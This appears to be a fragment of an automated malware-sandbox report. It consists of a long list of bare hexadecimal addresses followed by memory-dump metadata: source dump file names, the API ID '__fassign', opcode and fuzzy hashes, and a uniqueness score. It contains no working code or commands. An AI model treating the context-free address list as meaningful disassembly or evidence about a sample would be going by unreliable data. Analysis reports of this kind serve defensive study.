                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beccc
                                                                                                                                                                                                              0x008beccc
                                                                                                                                                                                                              0x008becd2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008becdf
                                                                                                                                                                                                              0x008bece0
                                                                                                                                                                                                              0x008bece4
                                                                                                                                                                                                              0x008beceb
                                                                                                                                                                                                              0x008becee
                                                                                                                                                                                                              0x008beca8
                                                                                                                                                                                                              0x008beca8
                                                                                                                                                                                                              0x008becaa
                                                                                                                                                                                                              0x0088fd76
                                                                                                                                                                                                              0x0088fd79
                                                                                                                                                                                                              0x0088fdb4
                                                                                                                                                                                                              0x0088fdb5
                                                                                                                                                                                                              0x0088fdb6
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fdb6
                                                                                                                                                                                                              0x0088fd7e
                                                                                                                                                                                                              0x008becfc
                                                                                                                                                                                                              0x0088fe2f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fe2f
                                                                                                                                                                                                              0x008bed08
                                                                                                                                                                                                              0x008bed0f
                                                                                                                                                                                                              0x008bed17
                                                                                                                                                                                                              0x008bed1b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bed1b
                                                                                                                                                                                                              0x0088fd88
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fd94
                                                                                                                                                                                                              0x0088fd99
                                                                                                                                                                                                              0x0088fda1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fdb0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fdb0
                                                                                                                                                                                                              0x008becbd
                                                                                                                                                                                                              0x0088fdc7
                                                                                                                                                                                                              0x0088fdcb
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fdd7
                                                                                                                                                                                                              0x0088fde3
                                                                                                                                                                                                              0x0088fe06
                                                                                                                                                                                                              0x008a1fe7
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a1fef
                                                                                                                                                                                                              0x008a1ff0
                                                                                                                                                                                                              0x008a1ff4
                                                                                                                                                                                                              0x008a1ff7
                                                                                                                                                                                                              0x008a1ffa
                                                                                                                                                                                                              0x008a1ffd
                                                                                                                                                                                                              0x008a2000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008becf1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008becf1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fe06
                                                                                                                                                                                                              0x0088fde8
                                                                                                                                                                                                              0x0088fdec
                                                                                                                                                                                                              0x0088fdef
                                                                                                                                                                                                              0x0088fdf2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fdf2
                                                                                                                                                                                                              0x0088fdcb
                                                                                                                                                                                                              0x0088fd04
                                                                                                                                                                                                              0x0088fd05
                                                                                                                                                                                                              0x008bec67
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bec6f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bec6f
                                                                                                                                                                                                              0x0088fd13
                                                                                                                                                                                                              0x0088fd3c
                                                                                                                                                                                                              0x0088fd40
                                                                                                                                                                                                              0x008bec75
                                                                                                                                                                                                              0x008bec7a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bec8a
                                                                                                                                                                                                              0x008bec8a
                                                                                                                                                                                                              0x008bec90
                                                                                                                                                                                                              0x008becb2
                                                                                                                                                                                                              0x0088fd73
                                                                                                                                                                                                              0x0088fd73
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fd73
                                                                                                                                                                                                              0x008bec95
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beca1
                                                                                                                                                                                                              0x008beca4
                                                                                                                                                                                                              0x008beca5
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008beca5
                                                                                                                                                                                                              0x008bec7a
                                                                                                                                                                                                              0x0088fd4a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fd6e
                                                                                                                                                                                                              0x0088fd6e
                                                                                                                                                                                                              0x0088fd71
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fd71
                                                                                                                                                                                                              0x0088fd4a
                                                                                                                                                                                                              0x0088fd21
                                                                                                                                                                                                              0x0089a3a1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0089a3a1
                                                                                                                                                                                                              0x0088fd36
                                                                                                                                                                                                              0x008a200b
                                                                                                                                                                                                              0x008a2012
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a2018
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008a2018
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0088fd36
                                                                                                                                                                                                              0x0088fe0f
                                                                                                                                                                                                              0x0088fe16
                                                                                                                                                                                                              0x0089a3ad
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0089a3b3
                                                                                                                                                                                                              0x0089a3b3
                                                                                                                                                                                                              0x0088fe1f
                                                                                                                                                                                                              0x008bed25
                                                                                                                                                                                                              0x008bed86
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bed91
                                                                                                                                                                                                              0x008bed95
                                                                                                                                                                                                              0x008bed95
                                                                                                                                                                                                              0x008bed9a
                                                                                                                                                                                                              0x008bedad
                                                                                                                                                                                                              0x008bedb3
                                                                                                                                                                                                              0x008bedba
                                                                                                                                                                                                              0x008bedc4
                                                                                                                                                                                                              0x008bedc9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bedcc
                                                                                                                                                                                                              0x008bed2a
                                                                                                                                                                                                              0x008bed55
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bed61
                                                                                                                                                                                                              0x008bed66
                                                                                                                                                                                                              0x008bed6e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bed7d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bed7d
                                                                                                                                                                                                              0x008bed30
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x008bed3c
                                                                                                                                                                                                              0x008bed43
                                                                                                                                                                                                              0x008bed4b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000A.00000002.2380521545.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380516990.0000000000830000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380618624.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380622848.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380627068.0000000000934000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380632555.0000000000937000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380636597.0000000000940000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 0000000A.00000002.2380671187.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __fassign
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3965848254-0
                                                                                                                                                                                                              • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                                              • Instruction ID: cfac600704774685271467b141e37622a5a52eab989a4f9751c855e79601add1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15915B31D0020AEFDF24EF98C8456EEB7B4FF95314F24807AD611EA263E7705A558B91
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%